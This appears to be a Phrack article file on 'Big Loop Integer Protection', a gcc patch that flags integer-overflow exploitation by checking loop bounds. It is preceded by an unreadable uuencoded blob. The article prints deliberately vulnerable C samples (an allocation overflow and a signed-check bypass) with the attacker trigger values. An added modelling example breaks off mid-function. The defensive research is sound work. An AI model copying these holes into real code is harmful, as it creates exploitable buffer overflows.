M/.%S'5V/?]392'B5H_.B\QQ==Y_OC%%>\3$G)[email protected]:><!N&J\R7"-6<#X=6.
MS\0^8QU+^'[email protected]+`-\BW.Z#>\"T.^]X'\[J"^E?S57-1<6"QQ(?=!_*OMW[#
MY<[email protected]_)^W=$R^B>X%?E#/"N2_V?IOSG\&\G_1X+^9^'EMCO3S49XOTMRA']#/
MYQCTKZ*[email protected]_%M%ANP_Z]9"^W[96-<P'^#X]YM]?BXFU#^NRR]UW_;D.%N
MHJWR\RRD_R/Y%=#5O%Z4^`+D$:=4#8G?B7\.>1Y_1Y[+D>>)[email protected]>+/&G
MHVQ/(NT1B4&[email protected],_?P+XI^DY%=_(/-!ALR`7T:9G[<FN<QOH6S/HIR+[A<8
MY-P/\7/R7QZ#/,\;L>XE2]<(O[`.(?PRCG'X_2#/LRA;3F+PAP\[email protected][E/QWQ
M]6OYUB+`;]&;2&!,R#\_CN/^SMI`X_[>&->V=<RWC&=`MJWUMLC6-0*[email protected]
MV)[!<Q3A'8SO<KS+/[email protected]?:YA'<TOM>QDPUOXKD,=?M[U.UUB-]&G=^(
M=W\`UM&?&_YPF/$\<;'Q//%PPW^.,)XA+K%[email protected]'@FJ_8R&`OVD2,X_5#+
MV=<0/MOX;M)*6]<[Y]BW$/ZPO8'PN?8W^>>16T"WDRG=POGY"[email protected][N?9_\#G
M)S6TU\,26X9^8%]^DM.7X*^Q6M;/$2_CZ\[email protected]*^%SKT$_PM8JX;"WF>`SQ
M?MJ:Y'@KXI]9\&+Y'R+>S88WV#^-^-?L0H[_!_%;#-X.N_.#L*Z7T[[email protected]
MHYO9UE\I4]C6G]G7D#2%A:1Q%^@KF6YW>W1[(&X/EI:69[V"'[email protected]_\0U-%I1
MJ;D)C$?"F>*RNA2^%%?4M9_#ZZ0NKXN^:%?7?,[email protected]:JC"+[H,5(]N$7L<JZ2
M1[C#:B5,[email protected]>FA0\>BA)NEFHE":?J/3YM3N,Q*%)AMY1U2[@M+([email protected]^6X
M*[email protected]['O2FHU:E$7=#V6E.=,ICT`[email protected]>4JESI=-/J>%YQ%T0<V%X80.],S9XZ
MJ\0SHK,<[email protected]=BMVZLM]JJT</&O-'8;%=BU9H=NK4%04<UYX::V]6J:LQC8]9H
M?;U6\N8R2P)!DIZ2`5I?TL1\7;1=XOJ"**88()^BY8W^[email protected]&7;O*UI!JSCQ
M6A3Z7+0$1D!+F][email protected]$.A>[email protected]'/(M]SETG?XO)1Y'*7R;7'YVBL61=-
M(I:N18'>1:[email protected]+<&@H0KS"."A=77W:.)Q-*S:@993I&O.,M8XJZPE5CJ5BW5
M(&?*U[B56I2NL)Q8G%9J-;K"@F)[email protected]#%2KD\.5HZ7CJ2B-BW+625$-1-O!Y
M2#[email protected]@^LJ/^R$D\Y):4#MGOV5T'.B.S7XISO:IVRSM1'W=:]:E7D&`
[email protected]'S5$]Z>!0\VR%E!]B2_MFXV)UKR>(-!SPMZ3MZA8C5O\45+`>\PZ`5!]X7P
[email protected]('/&ROFQ[)T,T^3HVX-L\I:JU\.9Z*P44_``AZ>Z,"')S(,B"ZIYJQHWFX*
MU.#[email protected](+/,,@BC(KX0LXKAAD46Q-]:O5N*O)LN3"CI/9J*/(HO""GDVJ
M*+PZW;:HM(JB]'+]4B>J*$+6!P)V.,UK!GFKK,[email protected],J:K)FW`S[K7IO`H.'
MPH>JN3U,L9(@]W]?=(=AJ][email protected];BJCJ4?2'),9.$'DEQ-TA6X).L26]3A`^6Z
[email protected])/\%ON24"OG=_!HU5N;+L`5G`$U:VX6,,$JGCY6WHF;1_GRC"K74$T+:
MK-D%G\7<7"^:0NG]X5,15YRG#LS'G`K48V[1_Y,[email protected])[email protected]<`D4&EC&?BRPQ
M!P([email protected]^G'IA&/!G4VU7>&PPU63\8"C4+G152J(%8-!!J<GXN%[email protected]@V$
MFES13X<:%;`[email protected]&K.A2PJH,!JS84L&J#`2MM6]-5B^BJ'[email protected]*Z:"=*[email protected]
M<E4(;\.N*GU[`5?-Y-[158M^[email protected]%/Y;H'3P5A>2&.*RL#.1HD4[Q`$JMFE$..
M9M2;#N-F?Z3].JG7>/':B^<@=^"Y,A\>=%?`[email protected]>K5>[email protected](Z:\N6
MA!WP^"6>Z[1;<:M'.X,P#>]RCOK,8O0>[O,=>N`[email protected]`VEC)R-^Q_F
M&OD(.D.'E]22(H)".4GB1CJ#K42]2+/)T`[email protected]&AT1('[email protected]#!;<[email protected]
MY?-4)[email protected]<5T1EH/V7^FVX&-!0&%C*#\165A59_:#@2>7SJ7\H50J2&=2Q:%$
M:J=K$5X<28*,^7(SR5,"6AZ*\.7!"!^;812BO)A!&/[email protected]:I0
[email protected](=HB5S$/UP/:H8W6Y4FE&R>B`Z=[UT8"[email protected][U?%%X9,(P%%LH[9C"
MA;E5I]);/9#*Z=T>2)0`%'U%[email protected];V?&0CFJ\'H%[email protected]"/HG5QM^T8FD-=##-8A
MX6#-X=$P.A?(JV'*`_L\L*4J#5>/1!E`[email protected]$%[email protected]!L']E:22!E=TFH"TMJ)3
M;U;PYI"[email protected]%?7O#YR%<;XN.U<T^Q%@1K(%BA)<V]_2GQ/*0:\Y#?'?F;
M'74K([email protected]#=:M]>9F'<4#[email protected]^9GZ5HE8[3"^[email protected]]`9,:S'GP(!3#OF?.
M[-3+B>??,B\000M6B]G.&[email protected]"!/U&J\\&S$:D)K!C(*'K>S08$'C&@F
M-M)X?.:<<*;R;,6,[email protected]=RI2,KJ5Z*"1*Q5`\5`>*[78Z7%?;Q"%4D/"-K!.5
M9TPSE#/6$U0S3M(SIGQ/S]E,]_0.E=)$<?C80&Y<F,'Q5"_%+*[email protected]>0N-Y`S
MBN0.NLEF<BJY0_4E[6HOI3P7HPPDZ/_/_D#&K_:$95RY.'EXF8Y:-:%$)[email protected]
M&&1"&[email protected]+G8G<5^)[\KX8GO1"0YWIC>[GI)DK;J_[;W+N!R7=5A\+FR
M9,D[)[(TS6<[email protected]:5QG?.:&GJ2Z:!YG3XNJ"061T#(3#ETB$-)$I%\V(#
M218(V[0Q+&2(^21S\>`0T$+/U[+T?"-#[email protected]!#S^I`@Q'R:(>;-08.I.7,4
M$;I='U:8?FM-4.NM++6NCPB:4]S(<HI3<XS*9VE^[email protected][YF35"ER^43`
M7<D<U\J!RR<J%R;X1&5BAW6:PEHHE[B^"[email protected]@QJK,&L#4L(8(1^25]S
[email protected](2V[%61+G-BF#95ILB=`QL>0JK6W$[Z71:0TKF'.]#3N5'[email protected]\S!&DM-QI
M`CPMU48+__,N;A4R)TE>_03-"/,[email protected](`V"?$$L>,1W85.9PQ:@%A\E8
M(=T-FX)(QB(B2:B(I,VL4!Y1%8+LT6"BVA-%J)*S14`F4DZ)RBFN3%[email protected]>072
M%'C([email protected](7R)I&=*[email protected];AJ2`'9T6DI;&ONO-""[email protected]#RH8M%BS
M3ALHRJ'*H5!V3XY"#Z/H066ELZK76JD,0*[email protected]<43.+VK27[$X]WG%'B=]
MQS<`,NDZ,<>ZWM%EZ::+2U(;F*Y!I"`QB3Q9#[email protected]`."J$["2)5A9L+L8
MX<90,Q`LDUO7?]8;-^!*#7.-,-<!3CADS&!^8_--.2T:@&[email protected][-S\>W
M(+F%([email protected]=UJZ;%>@Y=Y%2/BF!6(R8&R\\C2IQ8^C$L7DO#B
M8VR`ZT/1(8H22!3<R*"U5<$'V$:JM''@[email protected]:8XNGS0!4DKN*,S
[email protected]#DA+D4Q/,YV&:[email protected]:@!5D-Z"(VC;QJMZ`G>/$"(=!21\VT8RA>V]5H/Z
MH5+]P%2?>W*@IB'%D?H'7/]0GS:3?F/$D:[email protected]:D^GT`!#6`N`C)*W0NF[KQ)
M-K#`[email protected]@<*Q*9WB%A:QT?;@BJ"JI,[email protected]);XL]1<>UQ[T&A9:EJ9%6:CHO
M$OX0"NJK/?F02.R'EM+22G)`'%T18;&RF)1K<^7W'K517YWK5%1ZH4;@[email protected]`/
M/%$T^N/>2._/*[JLH6IT(2'(0K93?`6B1?0/NSUUPJH!AT*.4HI$!"`[email protected]"R
M.AY1IK`E!V%O&'[email protected]$;:3F\E:N&(#6=6\CY2P[%<U#J>-";-<;=[3!29
MG#[email protected]=UYO),#6GPSS!:YVD9J!12%!$'-U9O!XW8SU>O``K(J`9BYAX45\3
[email protected]=EHGC",E$\/&#`O,'%$RB?/&>LD5H$`YJQFGGQ%*E$U8\ID?!$XS*S
M"+I2*E>:O,0#Q$+F(HH,[email protected]*<)@E^J5XCQ$Z)($38BTGM/WAZ1$,5R
M68)Q,AB/*)K4W[=V"K]T'FLA3+$5G_Y1<0'[email protected]:"%%<-Y^9L
M!-/`N2!(1WC/[email protected]*5C/[email protected]%Q-."=7>@0(L:%$D)0U-H18H0+H/AI"[email protected]
M%SE"H;K]JP5C*++PL'G;R72[%H^AR')IH\5C"!RZ+&\!%UV.-XU=*:[email protected]\VD
M4CK#Z.6K$,6Y_J_([email protected]$'FX++''E$\<9DQ#&^GTH(9VA_.H.IV]J&&FIZUA
M0('C2.2)[email protected]/R2T+X#`U'TB)[email protected]!_I!#!#J';[email protected])!:`>4D,"@10RLIM45A1V
M;A)(J)J2RP\+9W51=)[email protected]$O=5Y;ZJ]`P`EC'U.'UY5:&8&S#[`/U:-1ZW20
MTB\28[G(Q&,1R3_:+KW643=B2!&+'-&R`R'6!L#D"<Q[DB"[email protected]$[E0]@F.2V/
M3JUWWJG3([7Z>2=:;/5:0SS.UI>(^[email protected]'!:*P1NW7);?&`PZB-=FM^DOK8G
MP]&[email protected]^ONV`8`GC;WSI<+<#+[[email protected]".][6D>J17C9"BS":@E>7P_CM'-O
MM8SI:^.>[email protected]\?O65[M0(O^X;)LBIM?E0;CJI^?M.L1[J9^C:JA#1SI52/
MU3CI8S1B]>)-AB'Y>;>&UN"[email protected]&*]VM5XQ357=PMNQ[;4P]V[`KTK'MN+7,.
[email protected]/,[email protected]<XD,!'#*1'[email protected]>D7V?EN:)*JZD22)WQW:TR,XS\()'2,^I,?FA*
[email protected]^[email protected](`BTQ*W\9Z0H8SZ"CJL+:)@#,DM`^Y'`J:%[email protected]*`04H8BRN-3HZ
MK^DB148&%JUIR5E:[email protected]>DK!(#*C&X)S(@;!1U._J*#K=T16`2W7[*]\L`O6
M8!<[email protected]\WR%D'D#/:Y!C8[)#*VF2'A=2TS)'H`IPV)#")O)YE!/--`31M)9Z!D
M(,_4U7HD^\/!4JVGU],2\[email protected]<H'-[([email protected]]<`\D$17%6BWTA'+%BI
MZ8RE`?#>:'SPW1T?L1#1[8[-9F*DV1)F8$+#[email protected]:IJ-JR"#OJR)
M>E`!+6^$\KD<@;X`%[email protected]@,`FDF<"*R`,AP2)WTUT90H(/6P""J!H08EO#DI\
M6U`[email protected]/:CROE-H3$#A0$I%\%V;L#N$,&E"#9S`\:%*$"*8#LW8&^)`J0(L4-5
[email protected]@!M*ZJ<WU0QMJ*P3BQH!`U$4S>^:>&B%>9SF*Z!F$6"0#%E)/76!I`@4,P9
M28E'P/*0#@TSG:?&41T6=7#1;@;GS!9U([email protected]<;'+/=H\S$R$"JB3E
MET'HHXR$GL(:&-(\D(C4T#K%E]G9&W?K+9<<3UN'QZU>HZ7#:,<[email protected],P
M;-=&[email protected](L:^:6`)N9?TP=CH"5C78$8'ZE8X(^-P_<"ATV/A0M<2Z'\?K
[email protected]$<40;N.L-Y[6X61)M!1)&`@LXRAL(IL24#>&!B(L0:OQH#8"2[GN
MU5<",[email protected]>X>:%-.B-FL"*&5MJ77E*OL%[#YM;N#[MX>5!&^;B6%=2#
M!29\[email protected];O-K'5%Z%":U^B!S"7!7*!TZ5"@,[email protected]@LH1H(J8D"+W"C<[L<RN,
MVJ6&1W\?V+/S3C4T^GO^MKW[%]28:,#VN?EJP7S>OO\6%#^#[email protected]'!83<#';
[email protected]/G]`I9V?YY3[]N_=H1JU]8ZM.W=QNQ"T>^?\[JT+VV[CIBG8
MG:L2[[email protected]`#8Q*6[&'9>[N=[I:MV[?MQ[9KT/ZY'T5Q0(0'3M0[YO;?:@^1
M1$5X:.`+>_>^?F[K[[email protected]$FI"C(D6GMNG:=:J!=5[WC?W/[[email protected]+\M6?OW!Y`
M:ZPN"+\KYGMA^\[]U4#7:^<\?NO\=^ZY8^NN:J"[email protected][))/[]O6S70
M^>_?>ZO"9YW;[ET[]]Q>+>C<]NY3!<X?V+>O&IH&;MT]I_INU]X][email protected]
MN=W[%NZJEG3;M[_NP-Z%:DG7?7YAZZZY:ED7MG]NMTI4+>[email protected]/SMU4K
MF0E0W33U#V#)[email protected][%C"@9.6]<-<^RECWY8\>N'WNEKUW(C!B)&K+`H!6MQ06
MZ]ZJSGZ)\H9;SE+)8L8BZY2.W>7B-`5GON(DUH[*[email protected]#X#IK!2_TCE&>1L?[`
M'C50M^R:(]R/MV]=V,J]C=^W[MPU1]\!5\[email protected]"[[email protected]@,[email protected]:H^U1XV
MT!#558F.J[!X$!U*660H3T2N(AI0!HJA/LD&(<.RCO8W)8#[email protected]#5H/%TSD1
M2#W[M(LZPP"4C`E:(`JIIT6K$$C\F&XW)L'A<[email protected])(<G&PP&.([email protected]!P
[email protected][email protected]<[R+8-94]T0E!.G\X-\<S6_LGK5VN=''=6V],<KD_*1
MF*VCJ,L1Y5FRI\8$M3G6U&*T[7.])?(F^A<6#[email protected]!52+TV/=U"`3P;1,
MCBAS<F70B\?J]%5&?LXX[,6.O"3-$KX\*U=([email protected]`Z&CKF[68E0"M6"''>
[email protected]],`)ZZ1"15Q,!X2.=-2.1LO$$R0+UJPCMQSWF%%8,#?VD!A,U&/:
MX"QIQP*TM9(@]9O[O18E1P-6HS?'756[42L]TDI'=L>ID&8ZDLM'[email protected]`=C0
M-(%DTA,XI*N>[email protected]/ZD:]EC16<1Y&`<L-.N>BV%*=F$DS+)#"9X,(!![=#+9!)
M*!,W/J*[3&MAA6!W6>6T[@)(@[email protected]#V!ZU>HY?))4%S`2Q&((Q1/HE#)>P`
MB#9SXQ>MNX8:E4/3&"^H]74#-J:6FMSTE0.$U)?DHIB)DTE&D;[email protected]",I*K=P
M&";^$Z("\>K1JKM'K)L81$2B`BT]K:.Q-B([email protected]$G!:[email protected]!PUF3</120
M?6.>7JO96N96H/15GP4:(SZ.])H9I7S*#%-A5A%E!>[email protected]=5W156W4FHF
M(Y'O54#2:J2()-&[email protected](L6D#9H!=3\L()6>(1F\2&$P"P0GNBS"8%%_#O11QJ&
M#CITZ:[email protected]+5P%/#*)?7SH5NRUO]0$\MP)O5&F1E'Z!PJ867F[INU\Z&((3ZL
M\**!'^@EA]GX0$2>;[email protected](.WCH,:QL998T6K<F36HVZ?!2P54JE1I]!]TO
MTAC2S*-,1+,O;ME`UE=69*T-Y0/Y4.&,#>9C^)"$!"3`7+I`YHLVN"[email protected]
M$NCL;;@^K6!SEOFL$I'[G]:V^`[B`[email protected]%^($J1=B!:[email protected]%V(&J1?F
MXI,"-QPPL3:@@KQ`!F5-"T(-F1)A>"3=07*'[email protected]*QT;`X6!P62H"S1R:
M^,[email protected]'0IC$B<N*$+E5$!I^7<;&/P;*(!-06,MCPA;-Q:,L7SKZA35^XVP;7
M'JO2'X^LNI`[email protected])IVMUH%:)>3+>4:H]-5?JG()="%YQZV,IJ12
M4RDYJ9,>)[email protected]/[BJH3J1'%`X\.BY<R*>E,%G*Q+5+`B0$PVV6LJ66_#`Y
M3!7"[T,5)%-3B>)9*]'H].TJE+X/5:`L307*9ZT`*DB;"[email protected]%MNL4;
MXPHX#_(K:5PF!UVI`[email protected]":[email protected]<QC9396B#UJ:;N"JKA9`O=/"5?
MF'3N=7;9LAAC3-$P:0=2C;KB$=DK_IZ'L'6T(09K\&8#N"Y&GA5][email protected]"GU31:
M[CK<^[email protected]$^=QM=*H#C;0P:MCJ]I=-*\.5;QN3P^-FJ2L:^F='$&#(Z?*#
MZ6M1VA\/B6IW*]%LI2,+RDKB(ZMN[GJ#A9F:[email protected]'Q,W9!.G42`,]5-G?<F
ML>O4/OH^H&/7K6;EK+W'[email protected](>^V]%N^/4`7<:"\,-C1TYT]RW,50JH"M<
M//[email protected]<M1M\;!^>[email protected]'J/FP+3)YS)VZC>2A=J_!\:T7I397.CO7+:MLV
[email protected]$E7[-Y[&D=F<AB;Z=IP6#\3+YX]*D?`[email protected][P?U9.5KJER<.MO:
M36>[email protected]*V57+3#3)<@"^G'1EOQ^G"B=G4UU<Z"=Z>,!.%'PC56DQ&DS%HK,>
[email protected],`)T,90(CPWVD%X_**`DA/`AM4B/&5M(H=B]BFCRF<4OH*RB?PJ'QR`S>]+
MI8GXKC(Q;Y<DPAM$8T-(R&[email protected]!=($41J59ERL_)CJ[.D"*SZTW$2)7I
MH!)DL=!WX!;BL)1<[email protected])HHGY]$`2P\"*:@`&872;VL42L[`6[_%YPZF&YV
M*N\(+(4_%1>*3M,F<:',4V82%[`[email protected]_!#([email protected]`]Q.%TMGZI3I_3&U*\[0
M"[email protected]/G8A65#TZ_"0]3;_ATH\$%@-8,Z2G5=BT\4%@E%I`XK7.>OL0
M]'Y9L`DQ]R(P9%W"1BS]%LDLM7GNAED<-Q+;N`1;[email protected]!C,$4]:$&[email protected]<2
MER!L*KFY(ML>_:X1(:`/MW/9A9JJF%JC+!L_HCA)[email protected]\2XUF1W.,2N,1&
ME8KTR("$\^A6CNRR1&[email protected]$QA(F="O*WB7]TH19<T=A$E<%5"IA92_;
[email protected],*3J)<3)[email protected]:Z9%[email protected][2`(9F-AH%X;-R9%L#'@4'VBWB:PT#973BD&L
M%0V-M(^^+0*[email protected]:M#KY[!>).F\:B!D$M+&,-YV/>;LE2=IZ80J3K'(83\WU2
M0(M%%$A*-6)%WJA"[email protected][email protected]:"[;RR:/6'Q["J"%'+4I4#)'F]GMJ<<UH6.+"
M1(==YUX'[email protected]<T-Z+99JM=&W=`_NP8'=?9KGA4(<EG*'&I.91PN5&UHD<Z
M0"\0**VXPA8>[AT-ST<T1<6'"L'BBTG5)[email protected]\@<)0D43"6-.[P&%V
M,[email protected]_DJ2*\WM&V#+!Y"-2BDF6S76!66D-;Y5%T:]`500Y00<@[email protected]
[email protected]^:O6*MBG0UOHA)<ND0->!1IQWS8;[email protected]!11C*PBELK`6:97&E1V]S(K8
M&7:U.BCF"8CR%MC'*-V*L$6&@=!"@:[email protected]#.T_<A"?QFUO#?A6Z;(K+Q`+Y
MM8Z)<!J)X_J;J"9(V+A!P2:[email protected]<BA6`KF81'"IPKX\!^!UM8GED\CTT)DRC
MS$MNF+:[email protected]:$%D/W7528DI.UL!+6&:8>5S\811"7QS6*0H-0U.:[4..I(P6:0
M=9(S5<[email protected]!4%*PB%&J=6Z"(/:`?8:[email protected]:BL:):!EL;_5;@W!X(+$T)32
MK`>%N&UD+;V\FN&:&"KH)HX;%DR:V!A:0)FY8P<[email protected],B8!*40B,,$(9:9*J
M*<C:G5%D:Y9%?IMJHK9U2)&,M:0*'T<Q>#/3`62PQ3%IA'`PVF+[[email protected]>`9:
MJ89Z8Z`ML30&F6$ML6J8FL)SO5$65[;WT^W)T(+RH;S?V6-L=&C"I7>[email protected])
M#2UR3JSS$YG\S1.IW!0+>CQ*0H_G148.SU[@[email protected]:_!:
[email protected]"([email protected]`8OVC625G)V+,LRLY2`*ICI4*\@Z$:;K$!!^]NG[*=L)+EF8NZT[H7
M$J<[email protected]+*$0,X(+)]X8RZ0I4L%SI&WS&R.2]F.%CXT58TY4CKC:9ZGQO')>
[email protected]&:1U\,HC6!7VY[>3#5[YI+\0XI]))TYO0THA:BK)A%=:$J42D8JE*`*'W

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x09 of 0x10

|=-------------------=[ Big Loop Integer Protection]=------------------=|
|=--------------=[ Oded Horovitz [email protected] ]=------------=|

--[ Contents

  1 - Introduction

  2 - Part I - Integer problems
    2.1 - Introduction
    2.2 - Basic code samples

  3 - Part II - Exploitation pattern
    3.1 - One input, two interpretations
    3.2 - What is the nature of the input?
    3.3 - Suggested detection

  4 - Part III - Implementation
    4.1 - Introduction 
    4.2 - Why gcc?
    4.3 - A bit about gcc
        4.3.1 - Compilation flow 
        4.3.2 - The AST
        4.3.3 - Getting started 
    4.4 - Patch Goals 
    4.5 - Patch overview
        4.5.1 - Tactics
        4.5.2 - Modifying the AST
    4.6 - Limitations

  5 - References

  6 - Thanks

  7 - Appendix A - Real life examples
    7.1 - Apache Chunked encoding
    7.2 - OpenSSH auth
  8 - Appendix B - Using blip  

--[ 1 - Introduction

Integer overflow and integer sign vulnerabilities are now common 
knowledge. This has led to increased exploitation of integer-related 
vulnerabilities. This article suggests a way to detect these 
vulnerabilities by adding compiler support that detects and flags 
exploitation of integer vulnerabilities. Specifically, a gcc patch is 
presented to demonstrate the feasibility of this technique.

The article is divided into three parts. Part one contains a brief 
introduction to some of the common integer related vulnerabilities. We 
list some of the recent public vulnerabilities. Part two of the article 
tries to explain the root cause of the problem with integer 
vulnerabilities. Using real examples, the article explains why 
exploitation is possible in the first place, and how it may be possible 
to detect exploitation of integer vulnerabilities, even when the 
vulnerability is not known in advance. Part three goes through the 
implementation of the suggested detection scheme. Since the 
implementation of this detection scheme is in the form of a gcc patch, 
introductory information about gcc internals is provided as well. We 
summarize the paper by demonstrating the protection at work against 
OpenSSH and the Apache httpd packages.

--[ 2 - Part I - Integer problems

----[ 2.1 - Introduction

In the last year attention seems to have shifted to a new bad 
programming practice. This practice is related to the possibility of 
integer overflows that cause buffer overflows. It turns out that many 
popular and (assumed to be) secure software packages (OpenSSH, Apache, 
*BSD kernel) share this vulnerability. The root cause of this bad 
practice is insufficient input validation for integer type input. Integer 
input looks so naive, only a few bits long. What can go wrong here? Well, 
it seems that quite a lot can go wrong. The following is a table of 
integer related vulnerabilities taken from the OpenBSD and FreeBSD 
security lists. All vulnerabilities were reported during the year 2002. 

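| Vulnerable package     | Short description of vulnerability           |
|------------------------|----------------------------------------------|
| OpenBSD select syscall | Positive limit checks against int value      |
| (See reference [4])    | allowing stack overflow                      |
|------------------------|----------------------------------------------|
| RPC xdr_array          | Int overflow causes small buffer allocation  |
|                        | which is later overflowed with input         |
|------------------------|----------------------------------------------|
| OpenSSH Authentication | Int overflow causes small buffer allocation  |
|                        | which is later overflowed with input         |
|------------------------|----------------------------------------------|
| Apache chunked-encoding| Positive condition is done on signed int     |
|                        | allowing heap overflow                       |
|------------------------|----------------------------------------------|
| FreeBSD get_pallette   | Positive condition is done on signed int     |
|                        | allowing information leak from kernel to user|
|------------------------|----------------------------------------------|
| FreeBSD accept1,getsoc-| Positive condition is done on signed int     |
| kname1,getpeername1    | allowing information leak from kernel to user|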
 Table 1 - Sample integer vulnerabilities in year 2002.

The common problem that exists in all of the above vulnerabilities is 
that an input of integer type (signed and unsigned) was used to trigger 
overflow (when writing) or info leak (when reading) to/from program 
buffers. All of the above vulnerabilities would have been prevented if 
proper limits had been enforced. 

----[ 2.2 - Basic code samples

Integer vulnerabilities can be further illustrated by looking at the 
following two simple code samples. 

Example 1 (int overflow): 
01	int main(int argc,char* argv[]){

02		unsigned int len,i;
03		char	*buf;
04		if(argc != 3) return -1;
05		len=atoi(argv[1]);

06		buf = (char*)malloc(len+1);
07		if(!buf){
08			printf("Allocation failed\n");
09			return -1;
10		}
11		for(i=0; i < len; i++){
12			buf[i] = _toupper(argv[2][i]);
13		}	
14		buf[i]=0;
15		printf("%s\n",buf);
16	}

The code above seems quite legit. The program converts a string to its 
upper case representation. First it allocates enough space for the string 
and the NULL termination character. Then it converts each character into 
its upper case value. But when looking a bit closer, we can identify two 
major problems in the code. First, the program trusts the user to supply 
as many characters as he specifies (which is obviously not the case) 
(line 5). Second, the program doesn't take into account that an integer 
overflow may occur when calculating the space to allocate (line 6). 
Trying to generalize the problem, the first bug may allow the attacker to 
read information which he didn't provide (by trusting the user input and 
reading *len* chars from argv[2]). The second bug allows the attacker to 
overflow the heap with his own data, and therefore to fully compromise 
the program.

Example 2 (sign check-bypass):
01	#define BUF_SIZE 10
02	int	max = BUF_SIZE;

03	int main(int argc,char* argv[]){

04		int		len;
05		char	buf[BUF_SIZE];
06		if(argc != 3) return -1;
07		len=atoi(argv[1]);

08		if(len < max){
09			memcpy(buf,argv[2],len);
10			printf("Data copied\n");
11		}
12		else
13			printf("Too much data\n");
14	}

The second example shows a program that intends to solve the problem 
introduced in the first example by limiting the user input length to a 
known and predefined maximum value. The problem in this code is that len 
is defined as a signed int. In this case a very big value (unsigned-wise) 
is interpreted as a negative value (line 8), which will bypass the limit 
check. Still, in line 9 the same value is interpreted as an unsigned 
positive number, causing a buffer overflow and possibly allowing a full 
compromise.

--[ 3 - Part II  - Exploitation pattern

----[ 3.1 - One input, two interpretations

So what is the real problem? How come such security-oriented packages 
have these vulnerabilities? The answer is that integer inputs sometimes 
have an ambiguous interpretation at different parts of the code (integers 
may change their sign at different values, implicit type casts, integer 
overflows). That ambiguous interpretation is hard to notice when 
implementing input validation code.

To explain this ambiguity let us look at the first example. At the time 
of allocation (line 6), the code believes that since the input is a 
number, adding another number to it will yield a bigger number (len+1). 
But since typical C language programs ignore integer overflows, the 
particular number 0xffffffff does not satisfy this assumption and yields 
an unexpected result (zero). Unfortunately the same error is *NOT* 
repeated later in the code. Therefore the same input, 0xffffffff, is this 
time interpreted as an unsigned value (a huge positive number). 

In the second example the ambiguity of the input is even more obvious. 
Here the code includes a silent type cast generated by the compiler 
when calling memcpy. The code therefore is checking the value of the 
input as if it were a signed number (line 8) while using it to copy data 
as if it were an unsigned number (line 9). 

This ambiguity is invisible to the coder's eye, and may go undetected, 
leaving the code vulnerable to this "stealthy" attack.

----[ 3.2 - What is the nature of the input?

Looking back at the above examples reveals a common meaning for the 
attacker input. (Sorry if the next few lines will explain the obvious :>) 
The above input is a number for a reason. It is a counter! It counts 
items! It doesn't matter what those "items" are (bytes, chars, objects, 
files, etc.). They are still a countable amount of items. And what can 
you do with such a counter? Well, you are most likely to do some 
processing "count" amount of times. As a note I will say that not *every* 
number is also a counter. There are many other reasons to have numbers 
around. But the ones that are related to integer vulnerabilities happen 
to be "counters" most of the time.

For example, if the count is for challenge response you may want to read 
"count" amount of responses (OpenSSH). Or if the count is buffer length 
you may want to copy "count" amount of bytes from one memory location to 
the other (Apache httpd). 

The bottom line is that somewhere behind this number there is the proper 
"loop" in the code that will do some processing, "count" number of times. 
This "loop" may have multiple forms such as the for-loop in the first 
example, or as an implicit loop in memcpy. Still all loop flavors will 
end up looping around the "count".

----[ 3.3 - Suggested detection

Ok, what do we have so far about those vulnerabilities?
- The input was ambiguously used in the code.
- Somewhere in the code there is a loop that uses the input integer as an 
iteration counter. 

To make the interpretation of the number ambiguous, the attacker has to 
send a huge number. Looking at the first example we can see that in order 
to make the number ambiguous the attacker needed to send such a big 
number that if doing (len+1) the number will overflow. For that to happen 
the attacker will have to send the value 0xffffffff. Looking at the 
second example, in order to make the interpretation of the number 
ambiguous, the attacker needs to send such a number that will fall into 
the negative range of an integer 0x80000000-0xffffffff. 

The same huge number sent by the attacker to trigger the vulnerability is 
later used in a loop as the iterations counter (As discussed in the 
section "What is the nature of the input?") 

Now let's analyze the exploit process:

1. Attacker wants to overflow buffer.
2. Attacker may use integer vulnerability.
3. Attacker sends a huge integer to trigger the vulnerability.
4. Count loop executes (probably) using attacker input as the loop bound.
5. A buffer is overflowed (on early iterations of the loop!)

Therefore detecting (and preventing) integer vulnerability exploitation 
is possible by validating the loop bounds before the loop executes. The 
validation of the loop will check that the loop limit is not above a 
predefined threshold, and if the limit is higher than the threshold a 
special handler will be triggered to handle the possible exploitation. 

Since the value required to trigger most integer vulnerabilities is huge, 
we can assume (hope) that most legitimate loops will not trigger this 

To get a feeling for what values we expect to see in integer 
vulnerabilities, let's examine the following samples:

- Allocating buffer for user data + program data

Looks like: buf = malloc(len + sizeof(header));

In this case the value required for triggering int overflow is very close 
to 0xffffffff since most program struct sizes are in the range of several 
bytes to hundreds of bytes at most.

- Allocating arrays

Looks like: buf = malloc(len * sizeof(object));

In this case the value required for triggering the overflow may be much 
smaller than in the first example but it is still a relatively huge 
value. For example if sizeof(object) == 4 then the value should be bigger 
than 0x40000000 (one Giga). Even if the sizeof(object)== 64 the value 
should be bigger than 0x4000000 (64 Mega) in order to cause an overflow.

- Falling to negative range

In this case the value required to make a number negative is any number 
bigger than 0x7fffffff. 

Looking at the values required to trigger the integer vulnerability, we 
can choose a threshold such as 0x40000000 (One Giga) that will handle 
most cases. Or we can select a smaller threshold for better protection, 
which may trigger some false positives.
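
The following C program is an added example, not code from the article 
or from the blip patch. It models 32-bit arithmetic with uint32_t to 
show how one input is read by the allocation, the signed check and the 
loop, and which trigger values a 0x40000000 threshold would flag; all 
function and struct names are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>

#define THRESHOLD 0x40000000u   /* "One Giga" threshold proposed in the text */

/* How different parts of a 32-bit program read the same input integer. */
struct views {
    uint32_t alloc_plus_one;   /* size malloc(len + 1) would receive        */
    int passes_signed_check;   /* outcome of "len < max" with a signed len  */
    uint32_t loop_count;       /* iterations a count loop or memcpy sees    */
    int over_threshold;        /* would a loop-bound check flag this value? */
};

static struct views interpret(uint32_t raw, int32_t max)
{
    struct views v;
    /* Two's-complement reading of the same 32 bits, done in 64-bit math
     * so the example does not rely on an out-of-range conversion. */
    int64_t as_signed = raw > 0x7fffffffu
                      ? (int64_t)raw - 0x100000000LL
                      : (int64_t)raw;

    v.alloc_plus_one = raw + 1u;               /* wraps to 0 for 0xffffffff */
    v.passes_signed_check = as_signed < max;   /* negative always passes    */
    v.loop_count = raw;
    v.over_threshold = raw > THRESHOLD;
    return v;
}

/* Smallest len for which len + extra wraps around (extra >= 1). */
static uint32_t min_trigger_add(uint32_t extra)
{
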